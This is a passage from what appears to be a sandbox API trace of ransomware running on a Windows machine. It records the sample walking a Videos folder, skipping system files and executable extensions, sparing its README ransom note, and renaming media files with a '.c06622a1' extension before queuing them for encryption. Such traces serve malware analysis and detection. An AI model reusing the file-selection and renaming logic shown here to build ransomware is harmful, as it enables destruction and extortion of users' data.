dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0156.317] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.318] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4284f7d1 [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x157e93ad [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40e2cfe6 [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x280c8bfd [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fdd289 [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ba6f367 [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ce16525 [0156.323] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d5714e [0156.326] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xfe99d6ec [0156.326] RtlComputeCrc32 (PartialCrc=0xd6ec, Buffer=0x4280094, Length=0x80) returned 0x9034b34e [0156.326] RtlComputeCrc32 (PartialCrc=0xb34e, Buffer=0x4280094, Length=0x80) returned 0xac04564b [0156.326] RtlComputeCrc32 (PartialCrc=0x564b, Buffer=0x4280094, Length=0x80) returned 0xd8cc4080 [0156.326] RtlComputeCrc32 (PartialCrc=0x4080, Buffer=0x4280094, Length=0x80) returned 0x1580588f [0156.326] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0156.326] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.326] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.326] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbc052e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbc052e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbc052e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.326] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.326] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccf66db0, ftCreationTime.dwHighDateTime=0x1d5e6ec, ftLastAccessTime.dwLowDateTime=0x73643110, ftLastAccessTime.dwHighDateTime=0x1d5de9f, ftLastWriteTime.dwLowDateTime=0x73643110, ftLastWriteTime.dwHighDateTime=0x1d5de9f, nFileSizeHigh=0x0, nFileSizeLow=0x7175, dwReserved0=0x0, dwReserved1=0x0, cFileName="uKIkmzIQ_.mp4", cAlternateFileName="UKIKMZ~1.MP4")) returned 1 [0156.326] _wcsicmp (_Str1="uKIkmzIQ_.mp4", _Str2="README.c06622a1.TXT") returned 3 [0156.326] wcsstr (_Str="uKIkmzIQ_.mp4", _SubStr="README") returned 0x0 [0156.326] _wcsicmp (_Str1="autorun.inf", _Str2="uKIkmzIQ_.mp4") returned -20 [0156.326] wcslen (_String="autorun.inf") returned 0xb [0156.326] _wcsicmp (_Str1="boot.ini", _Str2="uKIkmzIQ_.mp4") returned -19 [0156.326] wcslen (_String="boot.ini") returned 0x8 [0156.327] _wcsicmp (_Str1="bootfont.bin", _Str2="uKIkmzIQ_.mp4") returned -19 [0156.327] wcslen (_String="bootfont.bin") returned 0xc [0156.327] _wcsicmp (_Str1="bootsect.bak", _Str2="uKIkmzIQ_.mp4") returned -19 [0156.327] wcslen (_String="bootsect.bak") returned 0xc [0156.327] _wcsicmp (_Str1="desktop.ini", _Str2="uKIkmzIQ_.mp4") returned -17 [0156.327] wcslen (_String="desktop.ini") returned 0xb [0156.327] _wcsicmp (_Str1="iconcache.db", _Str2="uKIkmzIQ_.mp4") returned -12 [0156.327] wcslen (_String="iconcache.db") returned 0xc [0156.327] _wcsicmp (_Str1="ntldr", _Str2="uKIkmzIQ_.mp4") returned -7 [0156.327] wcslen (_String="ntldr") returned 0x5 [0156.327] _wcsicmp (_Str1="ntuser.dat", _Str2="uKIkmzIQ_.mp4") returned -7 [0156.327] wcslen (_String="ntuser.dat") returned 0xa [0156.327] _wcsicmp (_Str1="ntuser.dat.log", _Str2="uKIkmzIQ_.mp4") returned -7 [0156.327] wcslen (_String="ntuser.dat.log") returned 0xe [0156.327] _wcsicmp (_Str1="ntuser.ini", _Str2="uKIkmzIQ_.mp4") returned -7 [0156.327] wcslen (_String="ntuser.ini") returned 0xa [0156.327] _wcsicmp (_Str1="thumbs.db", _Str2="uKIkmzIQ_.mp4") returned -1 [0156.327] wcslen (_String="thumbs.db") returned 0x9 [0156.327] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.327] wcslen (_String="386") returned 0x3 [0156.327] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.327] wcslen (_String="adv") returned 0x3 [0156.327] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.327] wcslen (_String="ani") returned 0x3 [0156.327] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.327] wcslen (_String="bat") returned 0x3 [0156.327] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.327] wcslen (_String="bin") returned 0x3 [0156.327] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.327] wcslen (_String="cab") returned 0x3 [0156.327] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.327] wcslen (_String="cmd") returned 0x3 [0156.327] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.327] wcslen (_String="com") returned 0x3 [0156.327] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.327] wcslen (_String="cpl") returned 0x3 [0156.327] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.327] wcslen (_String="cur") returned 0x3 [0156.327] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.328] wcslen (_String="deskthemepack") returned 0xd [0156.328] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.328] wcslen (_String="diagcab") returned 0x7 [0156.328] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.328] wcslen (_String="diagcfg") returned 0x7 [0156.328] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.328] wcslen (_String="diagpkg") returned 0x7 [0156.328] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.328] wcslen (_String="dll") returned 0x3 [0156.328] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.328] wcslen (_String="drv") returned 0x3 [0156.328] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.328] wcslen (_String="exe") returned 0x3 [0156.328] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.328] wcslen (_String="hlp") returned 0x3 [0156.328] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.328] wcslen (_String="icl") returned 0x3 [0156.328] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.328] wcslen (_String="icns") returned 0x4 [0156.328] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.328] wcslen (_String="ico") returned 0x3 [0156.328] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.328] wcslen (_String="ics") returned 0x3 [0156.328] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.328] wcslen (_String="idx") returned 0x3 [0156.328] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.328] wcslen (_String="ldf") returned 0x3 [0156.328] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.328] wcslen (_String="lnk") returned 0x3 [0156.328] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.328] wcslen (_String="mod") returned 0x3 [0156.328] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.328] wcslen (_String="mpa") returned 0x3 [0156.328] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.328] wcslen (_String="msc") returned 0x3 [0156.328] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.328] wcslen (_String="msp") returned 0x3 [0156.328] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.329] wcslen (_String="msstyles") returned 0x8 [0156.329] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.329] wcslen (_String="msu") returned 0x3 [0156.329] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.329] wcslen (_String="nls") returned 0x3 [0156.329] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.329] wcslen (_String="nomedia") returned 0x7 [0156.329] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.329] wcslen (_String="ocx") returned 0x3 [0156.329] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.329] wcslen (_String="prf") returned 0x3 [0156.329] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.329] wcslen (_String="ps1") returned 0x3 [0156.329] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.329] wcslen (_String="rom") returned 0x3 [0156.329] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.329] wcslen (_String="rtp") returned 0x3 [0156.329] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.329] wcslen (_String="scr") returned 0x3 [0156.329] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.329] wcslen (_String="shs") returned 0x3 [0156.329] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.329] wcslen (_String="spl") returned 0x3 [0156.329] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.329] wcslen (_String="sys") returned 0x3 [0156.329] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.329] wcslen (_String="theme") returned 0x5 [0156.329] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.329] wcslen (_String="themepack") returned 0x9 [0156.329] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.329] wcslen (_String="wpx") returned 0x3 [0156.329] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.329] wcslen (_String="lock") returned 0x4 [0156.329] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.329] wcslen (_String="key") returned 0x3 [0156.329] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.329] wcslen (_String="hta") returned 0x3 [0156.329] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.329] wcslen (_String="msi") returned 0x3 [0156.330] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.330] wcslen (_String="pdb") returned 0x3 [0156.330] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0156.330] wcslen (_String="sql") returned 0x3 [0156.330] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.330] wcslen (_String="sqlite") returned 0x6 [0156.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.330] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.330] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.330] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned 0x4d [0156.330] wcscpy (in: _Dest=0x4530144, _Source="uKIkmzIQ_.mp4" | out: _Dest="uKIkmzIQ_.mp4") returned="uKIkmzIQ_.mp4" [0156.330] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4", dwFileAttributes=0x80) returned 1 [0156.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ukikmziq_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0156.330] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.331] ReadFile (in: hFile=0x67c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.331] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x10f75753 [0156.332] RtlComputeCrc32 (PartialCrc=0x5753, Buffer=0x3fe674, Length=0x80) returned 0xe434daad [0156.332] RtlComputeCrc32 (PartialCrc=0xdaad, Buffer=0x3fe674, Length=0x80) returned 0x9bd47d8 [0156.332] RtlComputeCrc32 (PartialCrc=0x47d8, Buffer=0x3fe674, Length=0x80) returned 0x8d9228bd [0156.332] RtlComputeCrc32 (PartialCrc=0x28bd, Buffer=0x3fe674, Length=0x80) returned 0x33972e0d [0156.332] CloseHandle (hObject=0x67c) returned 1 [0156.332] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.332] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4" [0156.332] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4") returned 0x5b [0156.332] wcscpy (in: _Dest=0x4540166, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.332] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ukikmziq_.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ukikmziq_.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\uKIkmzIQ_.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ukikmziq_.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0156.334] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.334] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f0f23b8 [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x969ad0c [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4c50952d [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a676849 [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7826e325 [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e3d1ea [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x290c0c90 [0156.340] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x722a250 [0156.343] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x87380c49 [0156.343] RtlComputeCrc32 (PartialCrc=0xc49, Buffer=0x4670094, Length=0x80) returned 0x30fe68c2 [0156.343] RtlComputeCrc32 (PartialCrc=0x68c2, Buffer=0x4670094, Length=0x80) returned 0xacd85c9c [0156.343] RtlComputeCrc32 (PartialCrc=0x5c9c, Buffer=0x4670094, Length=0x80) returned 0x56337dc1 [0156.343] RtlComputeCrc32 (PartialCrc=0x7dc1, Buffer=0x4670094, Length=0x80) returned 0x5957a3a9 [0156.343] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0156.343] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.344] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.344] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351cb3a0, ftCreationTime.dwHighDateTime=0x1d5df0d, ftLastAccessTime.dwLowDateTime=0x4ddaa1c0, ftLastAccessTime.dwHighDateTime=0x1d5dab4, ftLastWriteTime.dwLowDateTime=0x4ddaa1c0, ftLastWriteTime.dwHighDateTime=0x1d5dab4, nFileSizeHigh=0x0, nFileSizeLow=0x7537, dwReserved0=0x0, dwReserved1=0x0, cFileName="YfFJi.flv", cAlternateFileName="")) returned 1 [0156.344] _wcsicmp (_Str1="YfFJi.flv", _Str2="README.c06622a1.TXT") returned 7 [0156.344] wcsstr (_Str="YfFJi.flv", _SubStr="README") returned 0x0 [0156.344] _wcsicmp (_Str1="autorun.inf", _Str2="YfFJi.flv") returned -24 [0156.344] wcslen (_String="autorun.inf") returned 0xb [0156.344] _wcsicmp (_Str1="boot.ini", _Str2="YfFJi.flv") returned -23 [0156.344] wcslen (_String="boot.ini") returned 0x8 [0156.344] _wcsicmp (_Str1="bootfont.bin", _Str2="YfFJi.flv") returned -23 [0156.344] wcslen (_String="bootfont.bin") returned 0xc [0156.344] _wcsicmp (_Str1="bootsect.bak", _Str2="YfFJi.flv") returned -23 [0156.344] wcslen (_String="bootsect.bak") returned 0xc [0156.344] _wcsicmp (_Str1="desktop.ini", _Str2="YfFJi.flv") returned -21 [0156.344] wcslen (_String="desktop.ini") returned 0xb [0156.344] _wcsicmp (_Str1="iconcache.db", _Str2="YfFJi.flv") returned -16 [0156.344] wcslen (_String="iconcache.db") returned 0xc [0156.344] _wcsicmp (_Str1="ntldr", _Str2="YfFJi.flv") returned -11 [0156.344] wcslen (_String="ntldr") returned 0x5 [0156.344] _wcsicmp (_Str1="ntuser.dat", _Str2="YfFJi.flv") returned -11 [0156.344] wcslen (_String="ntuser.dat") returned 0xa [0156.344] _wcsicmp (_Str1="ntuser.dat.log", _Str2="YfFJi.flv") returned -11 [0156.344] wcslen (_String="ntuser.dat.log") returned 0xe [0156.344] _wcsicmp (_Str1="ntuser.ini", _Str2="YfFJi.flv") returned -11 [0156.344] wcslen (_String="ntuser.ini") returned 0xa [0156.344] _wcsicmp (_Str1="thumbs.db", _Str2="YfFJi.flv") returned -5 [0156.344] wcslen (_String="thumbs.db") returned 0x9 [0156.344] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0156.344] wcslen (_String="386") returned 0x3 [0156.344] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0156.344] wcslen (_String="adv") returned 0x3 [0156.344] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0156.344] wcslen (_String="ani") returned 0x3 [0156.344] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0156.344] wcslen (_String="bat") returned 0x3 [0156.344] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0156.344] wcslen (_String="bin") returned 0x3 [0156.344] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0156.345] wcslen (_String="cab") returned 0x3 [0156.345] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0156.345] wcslen (_String="cmd") returned 0x3 [0156.345] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0156.345] wcslen (_String="com") returned 0x3 [0156.345] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0156.345] wcslen (_String="cpl") returned 0x3 [0156.345] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0156.345] wcslen (_String="cur") returned 0x3 [0156.345] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0156.345] wcslen (_String="deskthemepack") returned 0xd [0156.345] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0156.345] wcslen (_String="diagcab") returned 0x7 [0156.345] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0156.345] wcslen (_String="diagcfg") returned 0x7 [0156.345] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0156.345] wcslen (_String="diagpkg") returned 0x7 [0156.345] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0156.345] wcslen (_String="dll") returned 0x3 [0156.345] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0156.345] wcslen (_String="drv") returned 0x3 [0156.345] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0156.345] wcslen (_String="exe") returned 0x3 [0156.345] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0156.345] wcslen (_String="hlp") returned 0x3 [0156.345] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0156.345] wcslen (_String="icl") returned 0x3 [0156.345] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0156.345] wcslen (_String="icns") returned 0x4 [0156.345] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0156.345] wcslen (_String="ico") returned 0x3 [0156.345] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0156.345] wcslen (_String="ics") returned 0x3 [0156.345] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0156.345] wcslen (_String="idx") returned 0x3 [0156.345] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0156.345] wcslen (_String="ldf") returned 0x3 [0156.345] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0156.345] wcslen (_String="lnk") returned 0x3 [0156.346] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0156.346] wcslen (_String="mod") returned 0x3 [0156.346] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0156.346] wcslen (_String="mpa") returned 0x3 [0156.346] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0156.346] wcslen (_String="msc") returned 0x3 [0156.346] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0156.346] wcslen (_String="msp") returned 0x3 [0156.346] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0156.346] wcslen (_String="msstyles") returned 0x8 [0156.346] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0156.346] wcslen (_String="msu") returned 0x3 [0156.346] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0156.346] wcslen (_String="nls") returned 0x3 [0156.346] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0156.346] wcslen (_String="nomedia") returned 0x7 [0156.346] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0156.346] wcslen (_String="ocx") returned 0x3 [0156.346] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0156.346] wcslen (_String="prf") returned 0x3 [0156.346] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0156.346] wcslen (_String="ps1") returned 0x3 [0156.346] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0156.346] wcslen (_String="rom") returned 0x3 [0156.346] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0156.346] wcslen (_String="rtp") returned 0x3 [0156.346] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0156.346] wcslen (_String="scr") returned 0x3 [0156.346] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0156.346] wcslen (_String="shs") returned 0x3 [0156.346] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0156.346] wcslen (_String="spl") returned 0x3 [0156.346] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0156.346] wcslen (_String="sys") returned 0x3 [0156.346] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0156.346] wcslen (_String="theme") returned 0x5 [0156.346] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0156.346] wcslen (_String="themepack") returned 0x9 [0156.346] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0156.347] wcslen (_String="wpx") returned 0x3 [0156.347] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0156.347] wcslen (_String="lock") returned 0x4 [0156.347] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0156.347] wcslen (_String="key") returned 0x3 [0156.347] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0156.347] wcslen (_String="hta") returned 0x3 [0156.347] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0156.347] wcslen (_String="msi") returned 0x3 [0156.347] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0156.347] wcslen (_String="pdb") returned 0x3 [0156.347] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0156.347] wcslen (_String="sql") returned 0x3 [0156.347] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0156.347] wcslen (_String="sqlite") returned 0x6 [0156.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.347] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.347] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.347] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned 0x4d [0156.347] wcscpy (in: _Dest=0x4530144, _Source="YfFJi.flv" | out: _Dest="YfFJi.flv") returned="YfFJi.flv" [0156.347] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\YfFJi.flv", dwFileAttributes=0x80) returned 1 [0156.348] 